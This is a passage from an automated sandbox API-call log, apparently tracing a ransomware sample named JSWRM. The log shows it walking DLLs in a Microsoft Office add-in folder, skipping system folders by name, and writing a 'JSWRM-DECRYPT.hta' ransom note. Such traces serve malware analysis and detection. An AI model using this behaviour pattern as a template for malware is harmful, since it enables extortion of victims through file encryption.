cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0126.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.dll", cchWideChar=50, lpMultiByteStr=0x20d800, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.dll", lpUsedDefaultChar=0x0) returned 50 [0126.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0126.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.dll", cchWideChar=50, lpMultiByteStr=0x20d920, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.dll", lpUsedDefaultChar=0x0) returned 50 [0126.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e228 [0126.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0126.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.715] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0126.715] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc0c33db, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc0c33db, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x47078, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.ReportingServices.RsClient.dll", cAlternateFileName="MI319B~1.DLL")) returned 1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.dll", lpString2=".") returned 1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.dll", lpString2="..") returned 1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.dll", lpString2="...") returned 1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.dll", lpString2="windows") returned -1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.dll", lpString2="recovery") returned -1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.dll", lpString2="perflogs") returned -1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.dll", lpString2="documents and settings") returned 1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.dll", lpString2="system volume information") returned -1 [0126.715] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.dll", lpString2="msocache") returned -1 [0126.715] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0126.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.dll", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0126.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.dll", cchWideChar=40, lpMultiByteStr=0x22ce70, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.dll", lpUsedDefaultChar=0x0) returned 40 [0126.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0126.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0126.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.dll", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0126.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.dll", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.dll", lpUsedDefaultChar=0x0) returned 40 [0126.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0126.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247898 [0126.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0126.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.716] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4561444, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4561444, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x85f4c0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.reportviewer.common.dll", cAlternateFileName="MI70D9~1.DLL")) returned 1 [0126.716] lstrcmpiW (lpString1="Microsoft.reportviewer.common.dll", lpString2=".") returned 1 [0126.716] lstrcmpiW (lpString1="Microsoft.reportviewer.common.dll", lpString2="..") returned 1 [0126.716] lstrcmpiW (lpString1="Microsoft.reportviewer.common.dll", lpString2="...") returned 1 [0126.716] lstrcmpiW (lpString1="Microsoft.reportviewer.common.dll", lpString2="windows") returned -1 [0126.716] lstrcmpiW (lpString1="Microsoft.reportviewer.common.dll", lpString2="recovery") returned -1 [0126.716] lstrcmpiW (lpString1="Microsoft.reportviewer.common.dll", lpString2="perflogs") returned -1 [0126.716] lstrcmpiW (lpString1="Microsoft.reportviewer.common.dll", lpString2="documents and settings") returned 1 [0126.716] lstrcmpiW (lpString1="Microsoft.reportviewer.common.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.716] lstrcmpiW (lpString1="Microsoft.reportviewer.common.dll", lpString2="system volume information") returned -1 [0126.716] lstrcmpiW (lpString1="Microsoft.reportviewer.common.dll", lpString2="msocache") returned -1 [0126.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0126.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.reportviewer.common.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0126.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.reportviewer.common.dll", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.reportviewer.common.dll", lpUsedDefaultChar=0x0) returned 33 [0126.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0126.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0126.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.reportviewer.common.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0126.716] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.reportviewer.common.dll", cchWideChar=33, lpMultiByteStr=0x22d0d8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.reportviewer.common.dll", lpUsedDefaultChar=0x0) returned 33 [0126.716] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0126.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x248058 [0126.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0126.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.717] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa4995f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa4995f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa531f86, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x872c8, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.reportviewer.winforms.dll", cAlternateFileName="MI925C~1.DLL")) returned 1 [0126.717] lstrcmpiW (lpString1="Microsoft.reportviewer.winforms.dll", lpString2=".") returned 1 [0126.717] lstrcmpiW (lpString1="Microsoft.reportviewer.winforms.dll", lpString2="..") returned 1 [0126.717] lstrcmpiW (lpString1="Microsoft.reportviewer.winforms.dll", lpString2="...") returned 1 [0126.717] lstrcmpiW (lpString1="Microsoft.reportviewer.winforms.dll", lpString2="windows") returned -1 [0126.717] lstrcmpiW (lpString1="Microsoft.reportviewer.winforms.dll", lpString2="recovery") returned -1 [0126.717] lstrcmpiW (lpString1="Microsoft.reportviewer.winforms.dll", lpString2="perflogs") returned -1 [0126.717] lstrcmpiW (lpString1="Microsoft.reportviewer.winforms.dll", lpString2="documents and settings") returned 1 [0126.717] lstrcmpiW (lpString1="Microsoft.reportviewer.winforms.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.717] lstrcmpiW (lpString1="Microsoft.reportviewer.winforms.dll", lpString2="system volume information") returned -1 [0126.717] lstrcmpiW (lpString1="Microsoft.reportviewer.winforms.dll", lpString2="msocache") returned -1 [0126.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0126.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.reportviewer.winforms.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0126.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.reportviewer.winforms.dll", cchWideChar=35, lpMultiByteStr=0x22d0d8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.reportviewer.winforms.dll", lpUsedDefaultChar=0x0) returned 35 [0126.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0126.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0126.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.reportviewer.winforms.dll", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0126.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.reportviewer.winforms.dll", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.reportviewer.winforms.dll", lpUsedDefaultChar=0x0) returned 35 [0126.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0126.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2474b8 [0126.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0126.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.717] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.717] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6165f55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6165f55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6460, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.SqlServer.Configuration.SString.dll", cAlternateFileName="MIB00C~1.DLL")) returned 1 [0126.717] lstrcmpiW (lpString1="Microsoft.SqlServer.Configuration.SString.dll", lpString2=".") returned 1 [0126.717] lstrcmpiW (lpString1="Microsoft.SqlServer.Configuration.SString.dll", lpString2="..") returned 1 [0126.717] lstrcmpiW (lpString1="Microsoft.SqlServer.Configuration.SString.dll", lpString2="...") returned 1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Configuration.SString.dll", lpString2="windows") returned -1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Configuration.SString.dll", lpString2="recovery") returned -1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Configuration.SString.dll", lpString2="perflogs") returned -1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Configuration.SString.dll", lpString2="documents and settings") returned 1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Configuration.SString.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Configuration.SString.dll", lpString2="system volume information") returned -1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Configuration.SString.dll", lpString2="msocache") returned -1 [0126.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0126.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Configuration.SString.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0126.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Configuration.SString.dll", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Configuration.SString.dll", lpUsedDefaultChar=0x0) returned 45 [0126.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0126.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0126.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Configuration.SString.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0126.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Configuration.SString.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Configuration.SString.dll", lpUsedDefaultChar=0x0) returned 45 [0126.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0126.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0126.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.718] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.718] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4409f1c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4409f1c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf443017d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5e2c8, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.SqlServer.Types.dll", cAlternateFileName="MI4FF6~1.DLL")) returned 1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.dll", lpString2=".") returned 1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.dll", lpString2="..") returned 1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.dll", lpString2="...") returned 1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.dll", lpString2="windows") returned -1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.dll", lpString2="recovery") returned -1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.dll", lpString2="perflogs") returned -1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.dll", lpString2="documents and settings") returned 1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.dll", lpString2="system volume information") returned -1 [0126.718] lstrcmpiW (lpString1="Microsoft.SqlServer.Types.dll", lpString2="msocache") returned -1 [0126.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0126.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0126.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.dll", cchWideChar=29, lpMultiByteStr=0x241380, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.dll", lpUsedDefaultChar=0x0) returned 29 [0126.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0126.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0126.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.SqlServer.Types.dll", cchWideChar=29, lpMultiByteStr=0x240f48, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.SqlServer.Types.dll", lpUsedDefaultChar=0x0) returned 29 [0126.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0126.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0126.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0126.719] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167cf4d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="ms", cAlternateFileName="")) returned 1 [0126.719] lstrcmpiW (lpString1="ms", lpString2=".") returned 1 [0126.719] lstrcmpiW (lpString1="ms", lpString2="..") returned 1 [0126.719] lstrcmpiW (lpString1="ms", lpString2="...") returned 1 [0126.719] lstrcmpiW (lpString1="ms", lpString2="windows") returned -1 [0126.719] lstrcmpiW (lpString1="ms", lpString2="recovery") returned -1 [0126.719] lstrcmpiW (lpString1="ms", lpString2="perflogs") returned -1 [0126.719] lstrcmpiW (lpString1="ms", lpString2="documents and settings") returned 1 [0126.719] lstrcmpiW (lpString1="ms", lpString2="$RECYCLE.BIN") returned 1 [0126.719] lstrcmpiW (lpString1="ms", lpString2="system volume information") returned -1 [0126.719] lstrcmpiW (lpString1="ms", lpString2="msocache") returned -1 [0126.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0126.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0126.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0126.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0126.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0126.719] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0126.719] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ms\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ms\\jswrm-decrypt.hta")) returned 0xffffffff [0126.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0126.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0126.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0126.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0126.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0126.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0126.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0126.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0126.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ms\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ms\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.722] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.722] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.723] CloseHandle (hObject=0x314) returned 1 [0126.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0126.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0126.724] HeapFree (in: hHeap=0x1e0000, 